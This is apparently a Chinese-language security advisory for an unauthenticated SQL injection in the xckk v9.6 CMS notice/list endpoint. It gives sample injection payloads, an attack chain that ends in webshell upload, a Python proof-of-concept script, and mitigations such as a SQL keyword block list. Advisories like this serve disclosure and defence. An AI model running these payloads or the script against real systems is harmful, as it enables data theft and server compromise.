CVE-2025-60267：xckk v9.6 notice/list接口SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-60267

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

xckk

漏洞概述

CVE-2025-60267是xckk内容管理系统v9.6版本中存在的一个SQL注入漏洞。该漏洞位于notice/list接口的cond参数中，由于该参数未经过充分的安全过滤和参数化处理，攻击者可以通过构造恶意的SQL语句片段注入到数据库查询中，从而绕过正常的身份验证和数据访问控制机制。xckk是一款基于Java开发的内容管理系统，广泛应用于中小型网站的信息发布与管理。该漏洞的CVSS 3.1评分为6.5分，属于中危级别漏洞。虽然该漏洞不会直接导致系统完全不可用（可用性影响为无），但攻击者可以利用该漏洞读取数据库中的敏感信息（如管理员凭据、用户个人信息等），甚至在特定数据库配置下执行数据修改操作，对系统数据的机密性和完整性构成威胁。该漏洞无需任何身份认证即可利用，且不需要用户交互，攻击者可以通过远程网络直接发起攻击，攻击门槛较低。由于xckk作为内容管理系统通常存储大量业务数据和用户信息，一旦被利用，可能导致数据泄露、篡改等严重后果。该漏洞已在GitHub上的int-ux/report项目中报告（issue #3），相关代码托管在Gitee平台（bestfeng/xckk仓库）。

技术细节

该SQL注入漏洞的根本原因在于xckk v9.6版本的notice/list接口在处理cond参数时，未采用预编译参数化查询（PreparedStatement）或充分的输入过滤机制，而是直接将用户输入拼接到SQL查询语句中。具体技术细节如下：

1. **漏洞入口点**：notice/list接口的cond参数。该参数原本用于传递通知列表的查询条件，但未对特殊字符（如单引号'、双引号"、注释符--、UNION、SELECT等）进行转义或过滤。

2. **注入原理**：当攻击者向cond参数传入类似 `' OR '1'='1` 或 `1' UNION SELECT username,password FROM users--` 的恶意字符串时，后端SQL语句将变为类似 `SELECT * FROM notices WHERE condition = '' OR '1'='1'` 的形式，导致WHERE条件恒为真或执行攻击者构造的UNION查询。

3. **利用方式**：
- **布尔盲注**：通过构造条件判断语句（如`' AND SUBSTRING(@@version,1,1)='5`），根据页面返回差异推断数据库信息。
- **UNION联合查询**：利用UNION SELECT提取数据库中的敏感数据，如管理员账号、密码哈希等。
- **时间盲注**：使用SLEEP()等函数进行基于时间的盲注，即使页面无明显回显也能获取数据。

4. **影响范围**：该漏洞影响xckk v9.6及可能存在的更早版本。由于cond参数在notice/list接口中直接暴露在HTTP请求中，攻击者无需任何权限即可远程利用。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具识别运行xckk v9.6的目标系统，确认notice/list接口的存在和访问方式。

STEP 2

步骤2：漏洞探测

攻击者向notice/list接口的cond参数发送测试payload（如单引号、AND 1=1、AND 1=2等），通过页面返回差异确认SQL注入漏洞的存在。

STEP 3

步骤3：注入利用

根据目标数据库类型（MySQL、Oracle等），构造相应的UNION联合查询或盲注payload，逐步提取数据库中的敏感信息。

STEP 4

步骤4：数据提取

利用SQL注入获取管理员账号、密码哈希、用户个人信息等敏感数据，可能进一步破解密码哈希获取明文凭证。

STEP 5

步骤5：权限提升与持久化

利用获取的管理员凭证登录系统后台，上传Webshell或修改系统配置，实现对目标系统的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60267 - xckk v9.6 SQL Injection PoC
# Vulnerability: SQL injection via cond parameter in notice/list endpoint
# Author: Security Researcher

import requests
import sys

TARGET_URL = "http://target-host/notice/list"
INJECTION_PARAM = "cond"

def check_injection(url, param):
    """Basic SQL injection detection using boolean-based technique"""
    # Normal request
    normal_payload = "1"
    normal_resp = requests.get(url, params={param: normal_payload})
    normal_length = len(normal_resp.text)
    
    # Boolean TRUE payload
    true_payload = "1' AND '1'='1"
    true_resp = requests.get(url, params={param: true_payload})
    true_length = len(true_resp.text)
    
    # Boolean FALSE payload
    false_payload = "1' AND '1'='2"
    false_resp = requests.get(url, params={param: false_payload})
    false_length = len(false_resp.text)
    
    if true_length == normal_length and false_length != normal_length:
        print("[+] Target is vulnerable to SQL injection!")
        return True
    else:
        print("[-] Target may not be vulnerable.")
        return False

def extract_data_union(url, param):
    """UNION-based SQL injection to extract database version"""
    # Determine number of columns first
    for i in range(1, 15):
        cols = ",".join([str(x) for x in range(1, i+1)])
        payload = f"0' UNION SELECT {cols}-- "
        resp = requests.get(url, params={param: payload})
        if resp.status_code == 200 and "error" not in resp.text.lower():
            print(f"[+] Number of columns: {i}")
            # Extract database version
            version_payload = f"0' UNION SELECT {cols.replace('1', 'version()')}-- "
            version_resp = requests.get(url, params={param: version_payload})
            print(f"[+] Database version info: {version_resp.text[:500]}")
            break

def time_based_injection(url, param):
    """Time-based blind SQL injection"""
    import time
    payload = "1' AND SLEEP(5)-- "
    start = time.time()
    resp = requests.get(url, params={param: payload})
    elapsed = time.time() - start
    if elapsed >= 5:
        print(f"[+] Time-based injection confirmed (delay: {elapsed:.2f}s)")
        return True
    return False

if __name__ == "__main__":
    print(f"[*] Testing CVE-2025-60267 against {TARGET_URL}")
    if check_injection(TARGET_URL, INJECTION_PARAM):
        extract_data_union(TARGET_URL, INJECTION_PARAM)
        time_based_injection(TARGET_URL, INJECTION_PARAM)

影响范围

xckk v9.6

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）或反向代理规则，过滤notice/list接口cond参数中的SQL关键字（如UNION、SELECT、INSERT、UPDATE、DELETE、SLEEP等）和特殊字符（如单引号、分号、注释符等）；2）限制notice/list接口的访问来源，仅允许可信IP段访问；3）对数据库连接账户进行权限最小化处理，禁止其访问information_schema等系统表；4）启用数据库操作审计日志，监控异常SQL查询行为；5）定期检查数据库日志，排查是否存在异常的数据访问记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60267
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60267
3 Details https://www.cvedetails.com/cve/CVE-2025-60267/
4 VulDB https://vuldb.com/cve/CVE-2025-60267
5 Link https://gitee.com/bestfeng/xckk
6 Link https://github.com/int-ux/report/issues/3